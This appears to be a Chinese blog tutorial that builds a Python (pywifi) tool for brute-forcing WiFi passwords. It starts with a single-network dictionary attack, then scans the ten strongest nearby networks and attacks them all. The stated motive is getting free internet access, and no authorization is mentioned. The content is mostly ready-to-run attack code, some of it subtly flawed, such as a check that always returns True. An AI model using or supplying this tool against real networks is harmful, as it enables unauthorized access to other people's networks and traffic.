0x00 前言
如何让自己有网吧?,对对对,就是这样....
如果一个搞web安全的,没有网,跟咸鱼有什么区别.....所以就有了本篇文章
0x01 Pywifi模块简单介绍
用一个连WiFi的例子,概括他的大概用法吧...
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 profile = pywifi.Profile() #创建wifi连接文件 profile.ssid = '*****' #定义wifissid profile.auth = const.AUTH_ALG_OPEN #网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK) #wifi加密算法 profile.cipher = const.CIPHER_TYPE_CCMP #加密单元 profile.key = '*****' #wifi密码 wifi = pywifi.PyWiFi() #抓取网卡接口 iface = wifi.interfaces()[0] #获取网卡 profile = iface.add_network_profile(profile) #加载配置文件 iface.connect(profile) #连接wifi
0x02 WIFI破解
一、对单一的目标破解
也许没表达对,我的意思呢,就是只对一个目标进行破解........
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def testwifi(password): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.disconnect()#断开无限网卡连接 profile=pywifi.Profile()#创建wifi连接文件 profile.ssid="*******"#定义wifissid profile.auth=const.AUTH_ALG_OPEN#网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元 profile.key=password #wifi密码 ifaces.remove_all_network_profiles()#删除其他所有配置文件 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件 ifaces.connect(tmp_profile)#连接wifi time.sleep(5)#5秒内能否连接上 if ifaces.status()==const.IFACE_CONNECTED: print "[-]WiFi connection success!" else: print "[-]WiFi connection failure!" ifaces.disconnect()#断开连接 time.sleep(1) return True def main(): print " ____ _ __ _____ _____ ___ " print " / ___|_ __ __ _ ___| | _ / /_ _| ___|_ _|" print "| | | '__/ _` |/ __| |/ / / / / | || |_ | | " print "| |___| | | (_| | (__| < V V / | || _| | | " print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|" path=r"password.txt" files=open(path,'r') while True: f=files.readline() if not f: break f = f[:-1] testwifi(f) print "[-]Current password:",f files.close() if __name__ == '__main__': main()
二、实现对附近WiFi扫描并破解目标:扫描信号前十的WIFI并实现破解
分步实现吧,先实现抓取ssidname,然后在加上信号强度
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 def getwifi(): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True) if __name__ == '__main__': print getwifi()
然后是通过信号强度实现排序,进入top10会进行后续的破解工作...
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def getwifi(): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True) def getsignal(): while True: n, data = getwifi() time.sleep(1) if n is not 0: return data[0:10] if __name__ == '__main__': print getsignal()
排完序之后,就是把信号强度去掉,然后获取ssidname
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def getwifi(): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True) def getsignal(): while True: n, data = getwifi() time.sleep(1) if n is not 0: return data[0:10] def ssidnamelist(): ssidlist = getsignal() namelist = [] for item in ssidlist: namelist.append(item[0]) return namelist if __name__ == '__main__': print ssidnamelist()
之后,就是上面对单个wifi破解的套路了,只需稍微改一下,直接贴代码了
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def getwifi(): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True) def getsignal(): while True: n, data = getwifi() time.sleep(1) if n is not 0: return data[0:10] def ssidnamelist(): ssidlist = getsignal() namelist = [] for item in ssidlist: namelist.append(item[0]) return namelist def testwifi(ssidname,password): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.disconnect()#断开无限网卡连接 profile=pywifi.Profile()#创建wifi连接文件 profile.ssid=ssidname#定义wifissid profile.auth=const.AUTH_ALG_OPEN#网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元 profile.key=password #wifi密码 ifaces.remove_all_network_profiles()#删除其他所有配置文件 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件 ifaces.connect(tmp_profile)#连接wifi time.sleep(5)#5秒内能否连接上 if ifaces.status()==const.IFACE_CONNECTED: print "[-]WiFi connection success!" else: print "[-]WiFi connection failure!" ifaces.disconnect()#断开连接 time.sleep(1) return True def main(): print " ____ _ __ _____ _____ ___ " print " / ___|_ __ __ _ ___| | _ / /_ _| ___|_ _|" print "| | | '__/ _` |/ __| |/ / / / / | || |_ | | " print "| |___| | | (_| | (__| < V V / | || _| | | " print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|" path=r"password.txt" files=open(path,'r') while True: f=files.readline() for ssidname in ssidnamelist(): ret=testwifi(ssidname,f) print 'Current WIFIname:',ssidname print 'Current password:',f files.close() if __name__ == '__main__': main()